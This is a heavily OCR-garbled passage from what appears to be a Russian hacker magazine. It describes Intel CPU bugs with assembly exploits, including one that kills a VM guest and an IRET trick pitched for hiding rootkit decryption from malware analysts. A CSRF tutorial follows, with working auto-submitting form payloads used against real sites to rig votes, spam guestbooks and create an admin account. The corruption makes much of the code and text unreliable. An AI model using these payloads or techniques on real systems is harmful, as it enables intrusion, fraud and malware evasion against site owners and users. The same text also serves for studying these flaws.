(что часто встречается на вирту- 
альных серверах, работающих 
на «автопилоте»), — убийство ѴМ 
превращается в реальную угрозу. 
Оказывается, достаточно задейс- 
твовать ОПЦИЮ ІА32_ОЕВ ІІССТЬ. 
ЕКЕЕЕЕ_ШІЬЕ_ЗММ_ЕЫ, которую 
можно активировать посредством 
записи уста новкибита ЕКЕЕ2Е_ 
шіье_зш_ш в МБП- регистре 
ІАЗ 2_оев л ость . И в с е ! В и рту а л ь - 
ная гостевая машина аварийно 
завершится кодом 80000021К. 
Хана, короче! Подробнее можно 
прочитать в разделе «ѴМ-Епігу 



Ра і Іи гез Оигіпд ог АЛег боабіпд 
Сиезі БШе» руководства «Іпіеі 64 
апб ІА-32 АгсЬііесіигез БоіТѵѵаге 
Оеѵеіорег’5 Мапиаі Ѵоіите ЗВ: 
Бузіет Ргодгаттіпд биібе, Рагі 
2 ». 



»ТагдеІ5:| 



В настоящее время дефектобна- 
ружен и подтвержден в кристаллах 
Соге 2 Ехігете ОиасІ-Соге 0X6000 и 
Соге 2 ОиасІ 06000. Про остальные 
процессоры пока ничего не извес- 
тно, но вполне возможно, что они 
также содержат эту ошибку. 



» ЕхрІоіі| 



Исходный текст ехріоіі’а, написан- 
ный мной на ассемблере, приведен 
ниже (чтобы использовать, необ- 
ходимо подставить фактический 
номер МБР-регистра в его имя, 
воспользовавшись соответствую- 
щим заголовочным файлом от Іпіеі, 
или сделать это своими руками 
— номера МБП и всех ихатрибутов 
содержатся в документации). 



УБИЙСТВО ГОСТЕВОЙ 
ВИРТУАЛЬНОЙ МАШИНЫ 
ЧЕТЫРЬМЯ АССЕМБЛЕРНЫМИ 
КОМАНДАМИ 

МОѴ ЕСХ , ІА32_БЕВШСТЬ 

КБМ 8 К ; читаем содержимое 
ІА32_БЕВШСТБ в ЕБХ : ЕАХ 

ОК ЕАХ, 40001т ; взводим 

бит ЕКЕЕ2Е_ШІЬЕ_8ММ_ЕЫ 
ШТМ8К ; обновляем 

М8К-регистр 



»5оІи(іоп 



I піеі предлагает какрешение на 
уровне ВІОБ’адаки программные 
«костыли», требующие модификации 
кода виртуальной машины. Однако, 
ни разработчики ѴМ, ни Місгозоіі 
(со своим Бегѵег’ом 2008, в состав 
которого входит виртуализатор) 
никак не отреагировали на ситуа- 
цию. Самоесмешное, что даже сама 
Іпіеі, выпустившая виртуализатор 
ѴігІиаІВох (бесплатный, кстати), не 
стала править код. Та к что... защита 
нам только снится :). 



ШТЕІ. 

РЕІМТШМ 

ѵ V КРАХ ОСНОВ- 
НОЙ МАШИНЫ 



»Вгіе* 



В конце марта 2008 года в про- 
цессоре ОиаІ-СогеХеоп 7000 был 
обнаружен мелкий, но весьма про- 
тивный дефект варварского типа, 
«поджидающий» кристалл в узких 
переходах между 64-битным режи- 
мом основной (ЬобЦ операционной 
системы и 32-битным режимом 
гостевой виртуальной машины. При 
задействованном режиме Нурег- 
ТГі геасііпд процессор (при стечении 
определенных обстоятельств) с 
некоторой (впрочем, довольно 
незначительной) вероятностью либо 
выбрасывает ІЕНН#, либо уходит в 
глухой зависон, отправляя в небытие 
нетолько виртуальные машины, но и 
основную операционную систему. А 
вотэтоуже нехорошо! Подробности 
этого увлекательного круиза смерти 
можно найти в официальном обнов- 
лении спецификаций «Бресібсабоп 
Црбаіе»: сіоѵѵпіоасі.іпіеі.сот/сіезіап/ 
хеоп/зресирсі 1/309627. рсІЕ 



»ТагдеІ5| 



Ошибка в настоящее время обнару- 
жена и подтверждена для Оиаі-Соге 
Хеоп 7000, но нельзя исключать, что 
ее нет и в других процессорах этого 
семейства. 



» Ехріоід 



Руками нетрогать! Оно и самоупа- 
дет, со временем. А чтобы помочь 
упасть, достаточно выполнять боль- 
ше переходов между 32-разрядной 
виртуальной гостевой машиной и 
64-битной операционной системой. 
Как? Да очень просто — достаточно, 
например, создать шторм ТСР/ІР- 
пакетов, на физическомуровне 
обрабатываемый сетевой картой 
основной операционной системы, 



а, значит, переключающий контекст 
выполнения на ее драйвер (для 
обработки очередного прерывания). 
Пройдет немного времени и случит- 
ся глобальный завис! 



»5оІи(іоп 



Поутверждению Іпіеі, проблему 
можно решить на уровне ВІОБ’а. 
Фирма разослала ведущим произ- 
водителям ВІОБ’ов и материнских 
плат рекомендации по обходу бага, 
но что-то те не спешат реагиро- 
вать. И обновленные прошивки 
ВІОБ’а этому дефекту процессора 
«совершенно перпендикулярны». 
Аотдуваются, как всегда, конечные 
пользователи. 



ОШИБКА 
#ІКЕТНА 
V "Т СЛУЖБЕ 
РУТКИТОВ 



» ВгіеГ 



Поздравляем! Іпіеі веников не вя- 
жет! 14 мая 2008 года в новейшем 
кристалле Соге 2 Ехігеппе 0X9000 
обнаружен древний баг, извест- 
ный еще с декабря 2005. Очень 
красивый, элегантный и чертовски 
полезный баг. Затрагивает мно- 
жество процессоров, выпущенных 
корпорацией Іпіеіза последние 
несколько лет. Это позволяет 
использовать его для защиты 
программного кода от всяких там 
дизассемблеров, эмулирующих 
отладчиков и реверсеров, отла- 
живающих малварь на живых, но 
слегка устаревших машинах. Но 
обо всем по порядку! Багсвязан с 
инструкцией ІКЕТ, традиционно 
использующейся в обработчиках 
аппаратных прерываний. Однако 
команда может использовать- 
ся и на прикладном уровне для 
передачи управления на кольцо с 
идентичным уровнем привилегий. 
При этом ІКЕТ последовательно 
выталкивает из стека регистр ЕІР, 
селектор СЗ и содержимое флагов. 
Если предварительно сохра- 
нить в стеке флаги, текущий СЗ и 
указатель на метку ІаЪеІ, то мы 
получим завуалированный аналог 
ултр ІаЬеІ, но тол ь ко ултр ІаЪеІ 
распознает любой дизассемблер, а 
ІКЕТ — обламывает ИДУ по самые 
помидоры. Создавать перекрест- 
ные ссылки приходится вручную. 
Впрочем, это — мелочи. Все самое 
интересное сидит внутри ІКЕТ. 
Только с виду она кажется простой 
командой. Даже в х86-процессорах 
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Соге 2 Оио — один из многих Дырявый Соге 2 Ехігете Оиа 
-Соге от 
заложен 
изделия 



процессоров с дырой «ІРЕТ -Соге от Іпіеі (стоимость ды 
ипсіег Сегіаіп СопсПбопз заложена в себестоимость 
МауСаизеап ІІпехресіесІ 
Аіідптепі СЬеск Ехсербоп 
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псевдокод, поясняющий действие ІКЕТ и приводимый в 
мануалах от Іпіеі, занимал несколько страниц (а реальный 
микрокод — и того больше). Поддержка 64-битного режима 
усложнила ІКЕТ в несколько раз. Во-первых, 64-битный 
режим требует обязательного выравнивания там, где в 
х86- процессорах оно было опционально. А теперь вопрос на 
засыпку: какдолжен вести себя процессор, если на момент 
начала выполнения ІДЕТ флаг АС сброшен (контроль вы- 
равнивания отключен), стек невыровнен.ав сохраненном 
значении регистра флагов (который будет извлечен после 
завершения инструкции ІКЕТ } флаг АС взведен? 

На это х86-процессоры (и некоторые х86-64) реагируют вполне адекват- 
но, то есть врубают контроль выравнивания послетого, ка к ХЖГ за кон- 
чит с вою работу. Впол нелогично, поскольку с точки зрения программиста 
все инструкции неделимы и выполняются за одну абстрактную итера- 
цию. Однако, поскольку мы имеем дело с РІ5С-ядром, выполняющим 
микрокод, то из-за ошибок в этом самом микрокоде, контроль выравни- 
вания включается во время выполнения инструкции ІКЕТ, что приводит 
к генерации прерывания Аіідптеп* СЬеск Ехсер*іоп (#АС). Причем, 
ошибке подвержена только та часть микрокода ІКЕТ, которая отвечает 
за передачу управления с кольца 3 на кольцо 3. Межкольцевой вызов в 
обозначенной ситуации исключения не вызывает. 
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Чел из М5 открыто признает, что ядро «зажимает» #АС-исключение на х86-системах 



АССЕМБЛЕРНЫЙ ТЕКСТ ЕХРІ_ОІТ'А р генерирующего #ас 
ИСКЛЮЧЕНИЕ НА БАГИСТНЫХ ПРОЦЕССОРАХ И НЕ ГЕНЕРИРУЮЩЕ- 
ГО НА ПРАВИЛЬНЫХ 

БЕС Е8Р ; делаем стек не выровненным 

РІЛЗНЕБ ; сохраняем флаги в стеке 

РОР ЕАХ ; выталкиваем в ЕАХ 

; взводим АС бит 
; сохраняем ЕАХ в стеке 
; сохраняем селектор кода 
; сохраняем адрес перехода 



ОК 

РБЗН 

РІЛЗН 

РБЗН 

ІКЕТ 



ЕАХ, 400 ООЬ 

ЕАХ 

С8 

оббзеб ту_пехб 



ту_пехб : 



; сюда предполагается передать 



» Тагдеізі 



Дефект обнаружен и подтвержден в следующих процессорах (пристегни ремни 
безопасности, прежде чем читать): ОиаІ-СогеХеоп Е31 1 0, ОиаІ-СогеХеоп 3000, 
Оиаб-СогеХеоп3200, 64-ЬІІ; I пІеІХеоп, Оиаб-СогеХеопЗЗОО, ОиаІ-СогеХеоп 
5000, ОиаІ-СогеХеоп 5100, Оиаб-СогеХеоп5300, 64-ЬкХеоп МР, ОиаІ-СогеХеоп 
7000, ОиаІ-СогеХеоп 7100, ОиаІ-СогеХеоп 7200, Оиаб-СогеХеоп 7300, Соге 2 
Ехігете 0X9775, Соге 2 Ехігете Оиаб-Соге 0X6000, Соге 2 Оиаб 06000, Соге 2 
Ехігете 0X9000, Соге 2 Оиаб 09000. Возможно, что и в некоторых других :). 



|» ЕхрІоіі| 



Как эту дыру можно использовать для атаки?А никак! Если программное обес- 
печение, используемое жертвой, при меняет ІКЕТ для передачи управления 
с кольца 3 на кольцо 3 (а зачем ему это делать?), да еще работаете невыров- 
ненным стеком и выталкивает в регистр флагов установленный бит АС — оно 
самоупадет. Іпіеідаже наблюдала та кое поведение на некоторых программах, 
правда, не сказала, каких. Но падаеттолько«неправильное» приложение, 
а не вся система целиком, и чтобы выполнить ІКЕТ на атакуемой машине, 
хакеру нужно иметь хотя бы минимальные права для выполнения своего кода 
(исполняемого файла или вбеіі-кода). Втаком случае уронить приложение 
можно и без всякого ІКЕТ' а. Смысл? Втом, что ІКЕТ передаст управление 
вовсе нетуда, куда ожидалось! То есть, мы можем написать очень хитрый код, 
который в дизассемблере (или подэмулирующим отладчиком) выполняет 
невинные действия, а вот на живой машине (сбагистным процессором) не 
только передаетуправление на основноетело, но и использует код исклю- 
чения для его расшифровки. Если исследователь малвари не в курсе этого 
бага, ему придется изрядно попыхтеть. Исходный код ассемблерного кода, 
демонстрирующего эту уязвимость, приведен ниже: 



управление 

ШС Е8Р ; возвращаем стек на место 



» 5 оІи(іоп 



Ачтотут можно сделать? Конечным пользователям — просто расслабиться. 
Реверсерам малвари — учитывать эту фичу при анализе кода. 

Попытка практической реализации ргооб-об-сопсері; ехріоіі’а поначалу 
не предвещала никаких неожиданностей. Горизонт был чист, сияло сол- 
нце. А междутем, гроза уже висела над моей норой: #АС-исключение не 
генерировалось! Хоть убей! Чего только я ни делал: курил, точил, долбил, 
перечитывал еггаіа от Іпіеі столько раз, что выучил наизусть. Под конец 
даже засомневался в здравости рассудка (своего или инженеров из 
Іпіеі). И как всегда, виноватой оказалась М іеговой. 

Анализ обработчика исключений, сосредоточенного в ядре, показал, 
что система наглым образом ныкает #АС-искл ючение, не передавая 
его на при клад ной уровень, и потому — до 5 ЕН/ѴЕН -об работников оно 
просто не доходит. Как в анекдоте: «До Штирлица не дошло письмо из 
Центра». Мои раскопки ядра подтвердились несколькими независимы- 
ми источниками. Так, например, Ргодгат Мападег(не программа, а со- 
трудник группы М іеговой Ѵівиаі С++) поимени КапдЗи 6аШп без ложной 
скромности писал: «Оп ібе х86 агсбііесіиге, Ше орегаііпд вувіет боев 
по* таке Ше аіідптепі: (аиИ ѵівіЫе ШТЬе арріісабоп» ( тасІп.тісгозоШ 
сот/еп-ив/ІІЬга гѵ/аа290049(Ѵ5.71 ).аврх) . Испытал это на своей шкуре 
хакер ЕаЬісаІ, цитируя мистера Капд 5и ѲаШп на форуме, где тусуются 
сишные программисты, причем довольно хорошо и плотно та к тусуются: 
*есЬ-агсЫѵе.пе*/АгсЫѵе/ѴС/тісгозо**.риЫіс.ѵс.[апаиаае/2004-1 2/01 99. 
Ыті . 

Уточним — х86-ядро «зажимает» #АС-искл ючение, а вот что касается 
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Бедный старый М5БКІ, идущий на диске с М5 Ѵізиаі 
Біисііо 6.0, — он по своей наивности считал, что флаг5ЕМ_ 
Ы0АибММЕІ\ІТРАІІІ_ТЕХСЕРТ применимтолько крискам! и незнал, 
что через несколько летта же самая фигня будет и на х86-64 

х86-64 — все зависит оттого, был ли запущен процесс с флагом 
8ЕМ_Ы0АЫ СШЕЫТРА ЦЬ ТЕХСЕРТ, переда иным АРІ -фун кци и 
ЗеѣЕггогМосІе () .1/1 если да, то исключение вновь будет «зажи- 
маться». Ксчастью, процесс поумолчанию стартует без этого флага, и 
приведенный выше исходный код ехрІоіБа будет работать, какчасы. 
Ладно, оставим х86-64 системы. С ними всеслишком просто, да и 
не очень-то они широко распространены. Вернемся назад кх86 и 
посмотрим, что можно сделать. Итак, ядро зажевало исключение и 
нам его никак не получить, разве что спуститься на ядерный уровень. 
Стоп! А ведь это — шикарный способ передачи управления ядерному 
модулю! Допустим, у нас есть гооікіі, устанавливающий драйвер, с 
которым взаимодействует прикладной код. Стандартный интерфейс 
ПеѵісеіоСопѣгоІ ( ) слишком известен и слишком заметен. А 
вот если драйвер перехватывает вектор #АС-исключения (что на 
ядерномуровне реализуется без проблем, например, путем прямого 
хука таблицы дескрипторов прерываний — она же ют), то ікет с 
невыровненным стеком заставит процессор сгенерировать исключе- 
ние, подхватываемое нашим драйвером. Можно до упаду анализиро- 
вать малварь, но вупор не видеть, что ІКЕТ передает управление не 
с гіпд-3 на гіпд-3 (согласно документации), а на гіпд-0. И уже нашему 
драйверу решать, что делать дальше. Можно передать управление 
обратно на гіпд-3 по адресу, занесенному в стек, но ведь можно и не 
передавать! Или передавать, но нетуда. Или (какуже говорилось 
выше) использовать вектор исключения для расшифровки осталь- 
ного тела гооікііа. Конечно, ключ получается какой-то беспонтовый и 
не слишком криптостойкий, но здесь главное — скрыть сам факт рас- 
шифровки. Благодаря ошибке в ЦП, он оченьдаже хорошо скрыва- 
ется. Конечно, код будет работать не на каждом ЦП (хотя и на многих), 
но малварь (в отличие от коммерческих программ) это обстоятельство 
как-нибудь переживет. Не один компьютер будет за ражен, та к другой. 
Хорошо, а как быть, если у нас драйвера нет, а писать его в лом? 
Можно ли обнаружить, что исключение имело место быть? Конеч- 
но! Обработка исключений — далеко не самая дешевая операция 
(в плане процессорныхтактов) и, замеряя время выполнения 
ІКЕТ, мы легко установим истинное положение дел. «Правиль- 
ная» ТЯЕТзанимает несколько сотен «тиков», легко измеряемых 
инструкцией КЕТЗС. А вот скрытая обработка исключения ядром 
уже тянет на десятки тысяч. Если операция измерения времени 
выполнения ІКЕТ несильно бросается в глаза, то хакер легко за- 
путает реверсеров, анализирующих малварь. И ужточно обойдет 
всякие эмулирующие отладчики и многие виртуальные машины. 
Учитывая, что Іпіеіфикситьэту багофичу не собирается, стоит взять 
ее на вооружение! Тем более — это не единственная дыра в процес- 
сорах. Есть и другие. Датам их сотни! Я как раз сейчас нарабатываю 
фактический материал и готовлю доклад, который (при благоприят- 
ном стечении обстоятельств) будет прочитан на хакерской конфе- 
ренции «Наск I п ТЬе Вох Бесигку» в Малайзии в октябре 2008 года. 
Для желающих посетить мероприятие напоминаю, что Малайзия 
оченьудобнатем, что нетребует визы, достаточно одного паспорта: 
соп^егепсе.ЬаскіпіЬеЬох.о т 




АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



Специальное предложение 1 : 

тспстли интернет 

I Ѣ II Ь Ч* V II ПОДЯПЙЧЕКИЕ БЕСПЛАТНО 
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В ОВЕЧЬЕЙ ШКУРЕ 




ЮЗАЕМ Х55 ТАМ, ГДЕ ЕЕ НЕТ 



Хакеры всегда стараются открывать дыры там, где они, казалось бы, отсутс- 
твуют. В нашем журнале и на задворках интернета ты найдешь кучу изъ- 
езженного материала о ХЗЗ. Но сейчас я расскажу тебе о технологии СЗКР, 
которая позволяет эксплуатировать ХЗЗ, там, где их действительно нет. 



Н ТЕОРИЯ 

Встретить на сайте іпсіисіе-баг — настоящая роскошь. Вот и выкру- 
чиваются хакеры, придумывают разные техники. Одна из таких тех- 
ник — С5РР или Х5ГСР (Сговв-Зйе Рециезі: Рогдегу), то есть межсайто- 
вые запросы, разновидность Х55/С55. Сама 05 ПР не нова, но очень 
актуальна. Взломщик заманивает юз ера на специальную страницу, 
которая посылает запрос уязвимому сайту, выполняя на нем какие- 
либо действия от лица пользователя. Уязвимости подвержены веб- 
приложения, которые не проверяют, откуда был передан запрос. 
Такможно выполнить какие-либо действия отлица авторизованного 
пользователя, например, админа. Действия эти ограничиваются лишь 
возможностями уязвимого интерфейса — будьто «запостить сообщение» 
или «сохранить БД в домашнем каталоге». 

Н ЧТО? ОТКУДА? КУДА? 

Рассмотрим баг подробнее. Возьмем, к примеру, ѴѴогбРгевв версии 2.3.2 
(другой версии у меня на винте не оказалось, а качать по мопеду дорого). 
Уязвимость в этой версии ѴѴР очень лакомая и, возможно, даже не единс- 
твенная (другие я искать не стал). Таится она во встроенном редакторе 
файлов. Заходим в «админку Управление -> Файлы» и видим лакомый 
<1ех{агеа>, а также список чаще всего редактируемых файлов. Открываем 
любой файл и пишем туда какую-либо ерунду. Работает? Еще бы, кодеры ѴѴР 
знаютсвое дело. 



Но про нас они тоже не забывают. Открываем іпдех.рЪр и сохраняем 
страницу браузера. Затем — редактируем: удаляем все, кроме формы 
редактирования. Получается что-то вроде: 

<Ъос1у> 

сЕогт пате= " бетріабе" теббюс1= "розб " > 

<іприб буре= "Мсісіеп" паше="_ѵфпопсе" ѵа1ие= " 0ае8245664 " /> 
сіприб Дуре» "МсМеп" пате= "_ 1 лф_Ъ.ббр_гебегег " ѵа1ие=" / 
ѵф-асбпіп/бетріабез . рйр" /> 

сіприб буре» "МсМеп" пате=" петое опбепб" ѵа1ие= " здесь код 
бпбех.рйр" /> 

сіприб буре= "Ъісісіеп" пате= " асбіоп" ѵа1ие= "ирбабе" /> 
сіприб буре= "Йісісіеп" пате=" бііе" ѵа1ие= " іпбех .рЪр" /> 
сіприб буре= 'МсМеп* пате= 1 зиЪтібу ' ѵа1ие= * Обно- 
вить файл &гарио; ' баЪіпс1ех= ' 2 ' /> 

</Тогшх/Ьо(Зу> 

Немного правим пемсоп бел б и <ЪодухИогт>: 

сЪобу опЬоаб= "босшпепб . дебЕіетепбВуІс! ( ' бетріабеаа ' ) . 
зиЪтіб ( ) "> 

сбогт пате= " бетріабе" іб= " бетріабеаа" асбіоп= "йббр : // 
ѵісбіт/тор-абтіп/бетріабез .рЬр" теббюс1= "розб " > 
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И пробуем открыть страничку. Что получилось? ѴѴР проглотил наш запрос 
и выдал радостное сообщение «Файл успешно отредактирован». При этом 
он не проверил, чтозапрос пришел с адреса левого хоста! Разберемся, что 
произошло. 

Браузерзашел на нашу страницу и выполнил ів-скрипт, который имитиро- 
вал отправку формы. Сервер получает запрос с Соокіе-данными и данными 
РОЭТ-запроса. Сначала он проверяет Соокіе: сессия есть, пользователь 
авторизован, доступ кадмин-панели имеется. Затем — обрабатывает 
Р05Т-данные, в которых сказано, что нужно в іпбех.рЬр сохранитьто-то и 
то-то. 

Это и естьХЗРР. С помощью нее можно делать потрясающие вещи... Самое 
время перейти кпримерам. 

Н ПРАКТИКА I — НАКРУТКА 

Создать еще одного админа в системе или отредактировать файл? Слишком 
банально (хотя и будет рассмотрено чуть дальше). Нужно придумать что- 
нибудь более нестандартное... 

Очень часто на форумах просятза что-либо проголосовать или спрашива- 
ют, как накрутить счетчики голосований. Если первая просьба частично 
выполняется, то на вторую чаще дают рекомендации, мол, «напишите 
скрипт, который будет голосовать. Но если там фильтрация по ІР, то из этого 
мало что получится». 

В помощь любителям халявы идет великий Х5РР. Специальную страницу, 
которая будет голосовать, посетят совершенно разные люди с разными 
ІР-адресами и чистенькими кукисами. Каждого та ко го «пользователя» 
бажный движок голосования воспримет как настоящего (хотя он итак 
настоящий) посетителя. 

И я решил провести Х5РР на каком-либо голосовании. Смотри, какя это 
сделал. 

Для начала я ввел в Гугле запрос «Нравится ли вам наш сайт? Голосовать» и 
получил в ответ полтора миллиона страниц. Особо не парясь, я перешел по 
первомулинку: 

Результаты голосования: Вам нравится наш сайт? 
соок. Ъепек.пеС/ѵокіпд/гаке/4 . Ъкті 

Вероятно, кулинария не столь популярная в рунете вещь: с 2003 года про- 
голосовало чуть более 250 человек. Я собрался исправить это недоразу- 
мение. Но я обломался, голосовать можно было хоть сто раз, а мне нужно 
было голосование сзащитой от накрутки. Вернувшись в Гугл, я стал дальше 
просматривать результаты и нашел то, что нужно: 

Голосования — ЬіБа.іп.иа 
Іісіа. іп . иа/ргд/ѵоке . іЩті?іс1=2 

Отдав свой голос, просмотрел результаты. После второй попытки они уже не 
менялись. Тогда я сохранил страницу с формой голосования на винчестере 
и немного отредактировал. Получилось следующее: 



<Ъос1у опЬоас1= "Ъосшпепк . деСЕІетепСВуІсІ ( ' теда_ѵоке' ) . 
зиЬтік ( ) " > 

сіогт асСіоп= "ЪССр : / /Іісіа. іп . иа/ргд/дек_ѵоСе . рЪр " 

іс!= " теда_ѵоСе " ек1іосЗ= "роз С " > 

сіприк Гуре= "Ъісісіеп" пате= " кое!" ѵа1ие="2"> 

<іприк Суре= "Ъісісіеп" пате="ѵоке" ѵа1ие=" 1 " > 

</іогт> 

</ Ъосіу > 

Почти тоже, что и предыдущей главе. А чтобы сделать голосование неяв- 
ным, вынес все это в отдельный файл — ѵоіе-ІісІа.іп.иа.ЫтІ . Файл іпсіех. 
Ыті содержал іігате на эту страницу: 

<Ылп1> 

<Ъеас1> 

<Сік1е>№эк ѵгогк! </Сік1е> 

<зку1е> 

Ъосіу {Ъаскдгоипсі: игі ( ' копт) ак . діі ' ) } 

Ы {Ьаскдгоипсі-соіог : ѵтЬіке; } 

</зку1е> 

</Ъеас1> 

<Ъос1у> 

<Ъ.1>№оС ѵ\гогк!</Ъ.1> 

< /Ъосіу > 

</Ъкш1> 

<іігате згс=" /ѵоке-іісіа . іп.иа.ЪЪті" місШЪ="1" 

ЪеідЪЪ= " 1 " ></іТгате> 

Это добро я залил науапбех: 

ЪкСр : / /коІреех-Ъка .пагоЪ. т/ 

И отправиллинкпаресвоих контактов. Счетчикувеличился на 2. Значит, все 
работало. Друзья рады хомячкам на страничке, а я — работающемуХЭРР. 
Результаты можно увидеть по адресу: 

ЪССр: / /Іісіа. іп . иа/ргд/деС_ѵоке . рЪр?кос1=2 

Реал ьно даже выставить <і1гаппе> на похеканном сайте! Тогда можно накрутить все, 
что угодно, необращая внимания на фильтрацию по ІР, ведь сайт будут посещать 
абсолютно разные посетители. Таким же образом можно накручиватьсчетчики на 
сайтах и «нажимать» на рекламу на собственном сайте. СХЭРРдоступно многое! 

В ПРАКТИКАМ — СПАМ 

Что такое посещаемый ресурс? Это много абсолютно разных независимых 
посетителей. Так почему бы не использовать их в корыстных целях? Вспом- 
ним, например, для чего используют ботнет — спам и ООоЗ! 

В нашем случае ОБоЗ — маловероятно, потому что нужно внедриться в очень 
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• Эксплуатация Х5РР 
тесно связана с ис- 
пользованием СИ. 

• Действия Х5РР 
ограничиваются лишь 
возможностями баж- 
ного интерфейса. 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно с 
целью ознакомления! 
Ни автор, ни редакция 
за твои действия 
ответственности не 
несут! 



крупный ресурс, «проі^гатеив» страницы на адрес цели. Нопохе- 
кать такой ресурс нереально. Может, я и попытаюсь, но не в этот раз. 
А вот спамить — вполне. 

В «][акере»уже была статья с названием «Веб-наводнение», в 
которой рассказывалось о написании флудера для различных 
ѵѵеЬ-движков. Однако простая защита от флуда (например, 
30-секундная задержка) сводит весь флуд на нет. Частенько, к 
томуже, работаетблокировка по ІР-адресу. 

В этом случае нужно юзать большие листы прокси ит.д. Но 
зачем, если есть своеобразный «ботнет». Мы будем использо- 
вать туже схему, что и с голосованиями. Сделаем небольшую 
спам-систему, состоящую из двух частей: 

Клиентская — внедряется на сильно-посещаемый 
ресурс 

Серверная — управляет потоком (куда спамить, 
как и что) 

Клиентская часть будет состоять из одного Нтате’а, который 
необходимо внедрить на какой-нибудь посещаемый ресурс. 

сіСгате СгатеЬогсЗег= "по" місІСЬя " 1 " 1іеід]тС= " 1 " 
згс= "йДРр : / /ѵтѵі. коіреех. Ри2 .ги/зрат.рйр" ></ 
ібгаше> 

Спамить будем несчастные гостевые книги :]. 

Необходимо выбрать конкретный движок гостевушки, напри- 
мер, Мапііх — первое, что попало под горячую руку. 

Далее идем в Гугл и составляем список целей (разумеется, все 
это можно автоматизировать, да и необязательно брать госте- 
вушки одного и того же двига, можно просто дублировать поля). 
Теперь приступаем ксерверной части, здесья сбацал неболь- 
шой скриптец, его исходникищи на ВѴО. 

Думаю, комментировать работу скрипта не нужно: он предельно лег- 
кий. Потестил на локале — все работало! Меняуспешно перебросило 
на один из сайтов, и там уже было запостено одно сообщение. Затем 
я залил обе части и стал ждать. Связка успешно работала — на сле- 
дующий день несколько книгбыли окончательнозаспамлены. Я уж 
извиняюсьперед владельцами, ноонитам итакбыли поуши вспаме. 

В ПРАКТИКАМ! — ПРОНИКНОВЕНИЕ 



200701224), увидел в сбапдеіод’е рбр-іпд Что уж говорить о 
таком незаметном баге, какХЭРР. Сразуже, установив этот 
билд и пройдя в админ-панель, я отключил пересылку геіегег и 
стал прощупывать самые интересные места. 

Не обошлосьтутбез создания пользователя из админки и 
назначения ему высших привилегий :). Реіюгегне проверялся, 
скрытых полей в форме создания не было — сплоит написан 
буквально за десять минут. 

Все это хозяйство я залил на пагосі.ги и стал гуглить сайты, 
работающие на ПипСМЭ. Честно говоря, найти сайте ПипСМЭ 
гораздо сложнее, чем с -Іоотіа :). 

После хитроумного запроса в Гугле была выбрана жертва 
— гипзіоге.ги . 

На этом сайте продают модуль интернет-шопа. 

Так каксплоит действовал только на админов, мне нужно было 
бытьуверенным, что админ прочитаетего, будучи авторизован- 
ным (либо в ЛС, либо через специальную форму обратной связи). 
Через последний способ я натайпил админу сообщение. И стал 
ждать... Ждать пришлось относительно недолго, всего несколько 
часов. Сплоит сработал немного нетак, какожидалось. 

Доступа в админ-панель не было, но рангоказался «Админис- 
тратор», ктомуже аккбыл зареган на мыльник ЬіЦуйтісгозоЛ. 
сот . Разумеется, я все рассказал настоящему админу ресурса 
и помогему кодом. Админ оказался отличным челом, и все 
оперативно пропатчил. 

Н50ШТІ0Ы 

Какзащититься? Элементарно. Нужно всего лишь проверять, 
с какого ІІПІ_ идет запрос. 

Для этого достаточно проверитьзначение заголовка 

КЕРЕКЕК. 

ГипсСіоп ѵа1ісіаСе_геГегег ( ) { 

Іі ( $_ЗЕКѴЕК [ ' КЕ01ШЗТ_МЕТНОБ ' ] ! == ' РОЗТ ' ) 
геСигп; 

і Г ( @ ' етрСу ( $_ЗЕКѴЕК [ ' НТТР_КЕЕЕКЕК ' ] ) ) { 
$геГ = рагзе_иг1 ( @$_ЗЕКѴЕК [ ' НТТР_ 
КЕРЕКЕК ' ] ) ; 

ІГ ( $_ЗЕКѴЕК [ 1 НТТР_ 

НОЗТ' ] ===$геб [ ’йозЕ ' ] ) геСигп; 

} 



Теперь рассмотрим совсем клинический случай — ГСипСМБ. 
Авторы этой системы на славу постарались и сделали настоя- 
щий полигон багов. Советую его начинающим багоискателям. 
Когда качал последнюю на тот момент версию — 1.6.1 (Ьиіісі 



Администраторский аккаунт 




сііе ( ' Іпѵаіісі гедиезС ' ) ; 

} 

ѵа1ісіаСе_геТегег ( ) ; 

Правда, и это не решение. Так как в связке сХ55 поле геіюггег 
будет правильным, — необходимо использовать скрытые 
поля, которые должны генерироваться случайным образом и, 
разумеется, проверяться при обработке запроса. 

И как об этом не догадываются другие кодеры? 

Н ЗЛОКЛЮЧЕНИЕ 

Несмотря нато, что шансы на победу (читай: защиту) у веб- 
мастеровтеоретически стопроцентные, в реальности — атаке 
подвержены очень многие публичные и самописные движки, 
абсолютно независимо от платформы. 

Поедая батон с кефиром, я находил Х5ПР чуть ли не на каждом 
втором сайте. Одна есть даже на іюгит.хакер.ги . не говоря уж о 
более мелких ресурсах. Искать Х5ПР очень просто. 

Вывод: отключаем посылку ге^еггег в настройках браузера (для 
Оперы, <Р1 2>-> ЭепсІ Реіюггегіпіюгтабоп), затем производим 
какие-либо действия и, если все прошлоуспешно, проверяем 
якобы уязвимую форму на наличие специальных полей, которые 
вставляются для защиты. 

Ксчастью.ты — честный человеки будешь использовать эту 
информацию не противозаконно, а сугубо для защиты. ЗЕ 
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Н ЦЕННОСТЬ С5М 

65М — основной стандарт, используемый в сфере сотовой связи. В качест- 
ве способа доступа к радиополосе он используетТОМА (множественный 
доступ с разделением по времени). Эта особенность отличает 65М-сети от 
СОМА-сетей, в которых доступ каждого абонента обеспечивается по всей 
ширине канала, без отведения времени, но с кодовым разделением. Хотя 
выигрыш в скорости очевиден, полный переход на СБМАпока невозможен. 
Абонент, производящий вызов, связывается с одной из базовых станций 
в близлежащей соте (на то она и сотовая связь). Для начала самостоятель- 
но изучи процесс поиска базовых станций (65М Тоѵѵегз). Для этого тебе 
потребуется специальное ПО, зависящее от платформы телефона и его 
марки. Осветим наиболее популярный софтсреди любителей поиска мачт 
оператора. 

НЫОКІА 

Большинство моделей этой марки имеют штатное средство Меітопііогдля 
отображения информации о базовой станции и ряде других параметров. 

На некоторых моделях МеІМопйог или РіеШТез* (какой еще именуется) 
необходимо набрать комбинацию «* 3 0 01 #123 4 5#*» и нажать клавишу 
вызова. Из полученной информации можноузнать много интересного. 
Основной характеристикой для базовой станции является СЮ (Сеіі ИепбБ/; 
не путать с СаІІегЮ). Согласно спецификации, СЮ принимает значение от О 
до 65535 для сот стандарта 65М, и более — для сот стандарта БІТМ5 (универ- 



сальнаятелекоммуникационная система стандарта ЗС). По-хорошему, это 
